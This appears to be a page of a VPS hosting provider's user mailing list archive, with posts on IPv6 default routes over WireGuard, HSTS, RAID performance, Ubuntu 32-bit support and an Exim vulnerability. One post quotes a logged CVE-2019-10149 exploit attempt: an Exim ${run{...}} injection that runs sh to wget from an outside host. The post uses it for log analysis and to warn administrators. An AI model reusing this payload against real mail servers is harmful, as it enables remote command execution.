BitFolk Users

users@mailman.bitfolk.com

1123 discussions

How to set up 2 default routes for IPv6 on Debian automatically on boot to give a fall back

by Keith Williams

Sorry long long post. tl;dr 2 default IPv6 routes different metrics set up persistent on Debian. I need a bit of advice concerning routing IPv6. Here is the problem. I do quite a bit of travelling around and a lot of it in SE Asia. I frequently find my self where the relevant ISP does not provide IPv6 connectivity. Even here at home my connection will occasionally change my address or I have to reboot the router and get a different one. I do things over the net for which I want IPv6, but also for DNS I need a stable fixed address. So I have an additional /56 subnet allocated to my VPS. Over the years I have tinkered with different VPN solutions to push these addresses down to my home network. I have found a different solution which not only was easy to set up, but works a dream except for one tiny issue. The /56 has been added to eth0 of my VPS. I am running wireguard and have it set up interface wg0 to which I route a /60 subnet. <bitfolk prefix>:e10::/60. Packets hitting this are encrypted with the server key and then encapsulated in IPv4 UDP packets and sent to the wg0 interface on my home machine, decrypted and if meeting criteria move through firewall etc. Sending out it is the same in reverse, encryption being via the client keypair. The client wg0 has subnet <bitfolk prefix>:e10::2/64, the server only accepting packets from this range and properly encrypted. Now here comes the problem. It is the default route issue. All that I read says that you cannot have 2 default routes in the same table. I have looked at a variety of solutions but find none except the one everyone seems to say is impossible but which works. I set the route *ip -6 route add ::0/0 dev wg0 metric 512. * Note the metric 512. The autoconfigured one has a metric of 1024. which gives me *ip -6 routedefault dev wg0 metric 512 pref mediumdefault via fe80::42c7:29ff:fe26:78c9 dev enp3s0 proto ra metric 1024 expires 265sec mtu 1488 hoplimit 64 pref medium* When I have finished fiddling and checking I will change the wg0 route to metric 2000 so that traffic will normally go through the main interface and when that has no IPv6 connectivity or is playing up, the wg0 route will be selected, (I hope). My 2 laptops, and Raspberry Pi will then be set up with their own wg1 etc interfaces and will then have their own /64 subnets. But when I try to get the route established automatically through the wireguard conf files or through PostUp I get the message can't do it as there is already an autoconfigured default. So I am stuck, at the moment with adding manually after every boot/reboot. Any suggestions please? VPS running Debian Stretch This box at home running Debian Buster. The only answer I can think of at the mo is turn off autoconfig, but then I lose this fallback mechanism and add difficulties with communicating with mobile phone/router etc. Or I guess I could forget the fancy fall back idea and just go through VPS but that could add a long delay when doing ordinary surfing. IPv4 of course just goes out through the normal interface

5 years, 9 months

Re: [bitfolk] HSTS fun on bitfolk.com

by Jess Robinson

Hi Andy, On 2019-07-01 09:58, Andy Smith wrote: > Hi Jess, > > On Mon, Jul 01, 2019 at 10:39:23AM +0100, Jess Robinson wrote: > > I eventually realised that the main bitfolk.com itself is sending > > hsts-required headers, and including all subdomains, which seems > > to trigger regardless of port :( Removing bitfolk.com fixed it for > > now, though presumably it will return if I visit the toplevel site > > again. > > TL;DR: Use example.vps.bitfolk.space. Aha! Do you need to add that for me? (didnt Just Work (tm)) > When I first started putting customers who did not have a domain of > their own under vps.bitfolk.com, I only ever thought that this would > be a short term arrangement for them. I didn't (and still don't) > really understand how anyone who would use a VPS would exist without > at least one domain name of their own. > > However, subsequent experience taught me that such people do exist, > in quite a number. It is perhaps not that they don't HAVE a domain > name, but that they do not wish to ADVERTISE any particular domain > name. > > I still don't understand it, but I accept that people keep wanting > to do this. Heh well, in the general case of actually deploying websites etc, I'd agree.. In this particular case I'm using my vps as a development box, cos its debian based, and sometimes easier to install stuff on than my desktop (which is gentoo) > Use of example.vps.bitfolk.com has a few different issues, such as > (non-exhaustive list): > > - Makes you subject to BitFolk's HSTS policy as you pointed out > > - May in future make you subject to Content Security Policy: > https://www.w3.org/TR/CSP3/ > > (bitfolk.com and panel.bitfolk.com have one but I don't think they > enforce it on subdomains at present) > > - Cross-domain leaking of cookies from .bitfolk.com to sub-domains. > > - Impossible for the customer to add extra DNS records like CNAME, > MX, AAAA, SRV, TXT or anything that might be generally useful in > one's own domain. > > HSTS is the real killer so far, so in January we introduced > the domain bitfolk.space and started putting customers who didn't > have a preference into vps.bitfolk.space instead, copying over all > existing records from under vps.bitfolk.com. > > We aren't going to enforce HSTS or anything like that on > bitfolk.space. At some point we will deprecate vps.bitfolk.com. I > still do not recommend long-term use of host names under > vps.bitfolk.space. > > HSTS etc won't be removed from bitfolk.com. It was a bad idea to > ever put customer stuff inside bitfolk.com. Aye, live and learn! Could you move jandj.vps.bitfolk.com over to .space please? (or do I need to email via the official support address for that..) Jess

5 years, 9 months

HSTS fun on bitfolk.com

by Jess Robinson

Yesterday I spent several hours trying to figure out why a dev website I am running on my bitfolk vps under a non-standard port, kept failing to load in my main browser - every time I visited it using http:// it kept directly requesting a https:// page .. which doesn't exist. I twigged fairly early (cos internet searchings) that it was probably something HSTS related (https://www.globalsign.com/en/blog/what-is-hsts-and-how-do-i-use-it/) .. but no amount of removing "jandj.vps.bitfolk.com" or "jandj.vps.bitfolk.com:8002" from hsts ( vivaldi://net-internals/#hsts ) was doing anything. I eventually realised that the main bitfolk.com itself is sending hsts-required headers, and including all subdomains, which seems to trigger regardless of port :( Removing bitfolk.com fixed it for now, though presumably it will return if I visit the toplevel site again. Any ideas if this can be worked around? (other than the obvious buy another domain / use one of my other ones temporarily) Jess

5 years, 9 months

Scans attempting to exploit CVE-2019-10149 have been in the wild for some days

by Andy Smith

Hello, I've just ran a grep on all of my mail logs for the string "run{" to see who's been trying to exploit CVE-2019-10149. A successful match looks like this on my MTA (Exim): 2019-06-19 14:57:19 H=li810-176.members.linode.com (service.com) [104.237.134.176] F=<support(a)service.com> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f85.119.82.70\x22}}(a)mail.bitfolk.com>: Unrouteable address This appears to be attempting to execute: sh -c "wget 64.50.180.45/tmp/85.119.82.70 on my host. I assume that the attacker watches their HTTP logs for requests for /tmp/85.119.82.70 and then they know they've found an exploitable host. Here's a list of offenders sorted by attempt count: Count Attacker Country AS ------------------------------------------------------------------------------------------------- 18 89.248.171.57 ( scanner20.openportstats.com) NL INT-NETWORK, SC [AS202425] 8 163.172.157.143 (143-157-172-163.rev.cloud.scaleway.com) GB AS12876, FR [AS12876] 6 104.237.134.176 (li810-176.members.linode.com) US LINODE-AP Linode, LLC, US [AS63949] 3 149.56.142.192 ( 192.ip-149-56-142.net) CA OVH, FR [AS16276] 3 104.200.137.239 ( mx239.odesktrack.com) US TOTAL-SERVER-SOLUTIONS - Total Server Solutions L.L.C., US [AS46562] 2 27.69.172.229 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552] 1 95.139.230.110 (node-110-230-139-95.domolink.tula.net) RU ROSTELECOM-AS, RU [AS12389] 1 79.173.123.131 ( Unset reverse DNS) RU TKTOR, RU [AS44270] 1 46.150.228.178 ( Unset reverse DNS) RU ABRIKOS-AS, RU [AS196768] 1 27.70.156.161 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552] 1 27.69.172.239 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552] 1 27.69.172.214 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552] Most worrying, a BitFolk IP was amongst my findings. i.e. there is a BitFolk customer VPS also doing this. Most likely they have already been compromised by this technique. I've removed them from the results above but I expect if you search your own logs you'll find them. They have already been notified. I created the above output with this script: https://gist.github.com/grifferz/f92a9c885443a0db8776c4f2f10f914f To use it in this case would be something like: $ zcat -f /var/log/exim4/mainlog* \ | grep "run{" \ | awk -F'[' '{ gsub(/\].*/, "", $2); print $2 }' \ | sort | uniq -c | sort -rn | ~/attackers.sh The awk is separating an IP address out of the [1.2.3.4]. The sort/uniq/sort is generating an event count. attackers.sh is merely getting extra info about the IP address. Cheers, Andy -- https://bitfolk.com/ -- No-nonsense VPS hosting

5 years, 9 months

No 32-bit Ubuntu after 19.10

by Andy Smith

Hello, If I am reading this correctly: https://discourse.ubuntu.com/t/i386-architecture-will-be-dropped-starting-w… then 18.04 was the last LTS release of Ubuntu on 32-bit x86 CPUs. If you wish to run Ubuntu 20.04 at BitFolk then you will need to do that as 64-bit amd64. As Ubuntu supports 18.04 to some degree out to the year 2028, if you're currently on 32-bit then you could remain on that release for some time. Although you will of course find it harder and harder to get by with older package versions. If you are currently on 32-bit Ubuntu and wish to switch to 64-bit you can do so yourself by doing a self-install: https://tools.bitfolk.com/wiki/Using_the_self-serve_net_installer You would need to use the "arch" command first to switch from 32-bit to 64-bit. If re-installing is too much disruption, a reminder that we are happy to give you an additional VM for free for up to 2 weeks for you to migrate into: https://tools.bitfolk.com/wiki/Migrating_to_a_new_VPS Finally, it is possible to cross-grade from 32-bit to 64-bit, but the procedure is complicated, scary, and not supported by either Ubuntu or BitFolk. More info here: http://users.digitalkingdom.org/~rlpowell/hobbies/debian_arch_up/index.html https://wiki.debian.org/CrossGrading (Yes, these are for Debian, but the steps are basically the same for Ubuntu) The only BitFolk-specific deviation from the above procedure that is required is to make sure to use the "arch" command in the Xen Shell to switch to 64-bit before you try to boot your 64-bit kernel. Otherwise it starts a 32-bit boot loader that won't work. It won't hurt anything, it just won't work until you change it. Cheers, Andy -- https://bitfolk.com/ -- No-nonsense VPS hosting

5 years, 9 months

Filesystems/volume management for home servers

by Gavin Westwood

With the discussion about RAID 10, that got me back to thinking about better/alternative system to my current RAID1+LVM+EXT4 setup on our Linux home server and I'm looking for advice from other members. Currently we have 13.6 TB of storage (a lot of which are photos by my semi-professional girlfriend, and videos from our wildlife cam which produces about 15 - 20GB of videos a day [email me off-list if you want to want the URLs of my fledgling Youtube hedgehog and bird channels]). There is some amount of file duplication, for instance where I have stuck old backups (copied files and folders, not tar/compressed archives) on there or photos/videos have been copied to different folders (e.g. to categorise), so filesystems with built-in deduplication (like I believe BTRFS has) would be nice. However my main priorities are: maintaining data integrity, ease of administration, and really a sub-category of that: ease to expand or shrink and reallocate storage as required (if necessary - quotas are not required, but crashing due to a full disk is to be avoided). For years I have been looking at BTRFS, but it's never sounded 100% production ready to me (although I remember that at least one distro made it their default fs). Andy's mention of ceph and stratis were something new to me, but I'm not sure if they are a bit much for a single server, and I've no experience with ZFS, but I think I read about some disadvantages that put me off a few years back, but I forget what they were now. Anyway, what do/would you use for this sort of scenario/requirement or what are your experiences with suitable filesystems for my requirements? Just to be clear - I want to ensure that a single disk failure is very unlikely to result in data loss. Also, all disks are currently the spinning disk type, so any features that takes advantage of SSDs would be wasted. Thanks Gavin

5 years, 9 months

Make sure to upgrade your Exim

by Andy Smith

Hello, If you run Exim and have local users you will want to make sure that it is upgraded as a matter of urgency as there is a trivial arbitrary command execution as root bug in most recent versions: https://seclists.org/oss-sec/2019/q2/152 Even if you are the only local user you should upgrade as it's possible, though more difficult, to exploit remotely. Cheers, Andy -- https://bitfolk.com/ -- No-nonsense VPS hosting

5 years, 10 months

Something to laugh at

by Keith Williams

The something today is me My SSH is set up to use a different port and login by key only no passwords. I then added to my firewall a rule that any attempt to connect on ports 22 or 23 would add the IP to a blacklist with a timeout of one day. Any further attempt by that IP to connect on any port would reset the timeout back to 24 hours. It's all logged and I have spent many happy hours running through the log seeing what other ports these miscreants attempt. All well and good until today. I have just returned after a year in the far east, and today still feeling jetlagged, I fired up my desktop computer, not used in just over a year and clicked on the SSH client icon to connect so that I could do my regular log checking but it would not connect, I did not look at the port, but remembered I had changed the keypair a few months ago. So transferred the key across from my laptop, still no joy. Ran windows diagnostics, no response from remote host, pings, nothing. Email, nothing, website nothing. Panic started to set in, could not even get in through XEN, though that should have worked. I used my laptop tethered still to my phone and was in straight away. Different IP. Yes I had locked myself out for 24 hours. In the meantime I had sent a panic email to support. Sorry Andy. It was a matter of minutes once the penny had dropped to get on the laptop and delete my home IP from the blacklist Such a silly elementary mistake So idiot of the day is... Keith

5 years, 10 months

Interesting (?) Linux RAID-10 performance caveat

by Andy Smith

Hello, A new BitFolk server that I will put into service soon has 1x SSD and 1x NVMe instead of 2x SSD. I tried this because the NVMe, despite being vastly more performant than the SATA SSD, is actually a fair bit cheaper. On the downside it only has a 3 year warranty (vs 5) and 26% of the write endurance (5466TBW vs 21024TBW)¹. So anyway, a pair of very imbalanced devices. I decided to take some time to play around with RAID configurations to see how Linux MD handled that. The results surprised me, and I still have many open questions. As a background, for a long time it's generally been advised that Linux RAID-10 gives the highest random IO performance. This is because it can stripe read IO across multiple devices, whereas with RAID-1, a single process will do IO to a single device. Linux's non-standard implementation of the RAID-10 algorithm can also generalise to any amount of devices: conventional RAID-10 requires an even number of devices with a minimum of 4, but Linux RAID-10 can work with 2 or even an odd number. More info about that: https://en.wikipedia.org/wiki/Non-standard_RAID_levels#Linux_MD_RAID_10 As a result I have rarely felt the need to use RAID-1 for 10+ years. But, I ran these benchmarks and what I found is that RAID-1 is THREE TIMES FASTER than RAID-10 on a random read workload with these imbalanced devices. Here is a full write up: http://strugglers.net/~andy/blog/2019/05/29/linux-raid-10-may-not-always-be… I can see and replicate the results, and I can tell that it's because RAID-1 is able to direct the vast majority of reads to the NVMe, but I don't know why that is or if it is by design. I also have some other open questions, for example one of my tests against HDD is clearly wrong as it achieves 256 IOPS, which is impossible for a 5,400RPM rotational drive. So if you have any comments, explanations, ideas how my testing methodology might be wrong, I would be interested in hearing. Cheers, Andy ¹ I do however monitor the write capacity of BitFolk's SSDs and they all show 100+ years of expected life, so I am not really bothered if that drops to 25 years. -- https://bitfolk.com/ -- No-nonsense VPS hosting

5 years, 10 months

apt-clone problem

by Ian Hobson

Hi All, I am trying to clone my bitfolk Ubuntu 18.04 VPS, using apt-clone. The issue is that the restore overrides /etc/apt/sources.list - so it fails, because it could not connect to apt-cacher.lon.bitfolk.com:80. Any ideas how to restore the packages? Regards Ian -- Ian Hobson Tel (+351) 910 418 473

5 years, 10 months

Jump to page:

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

2010

2009

2008

BitFolk Users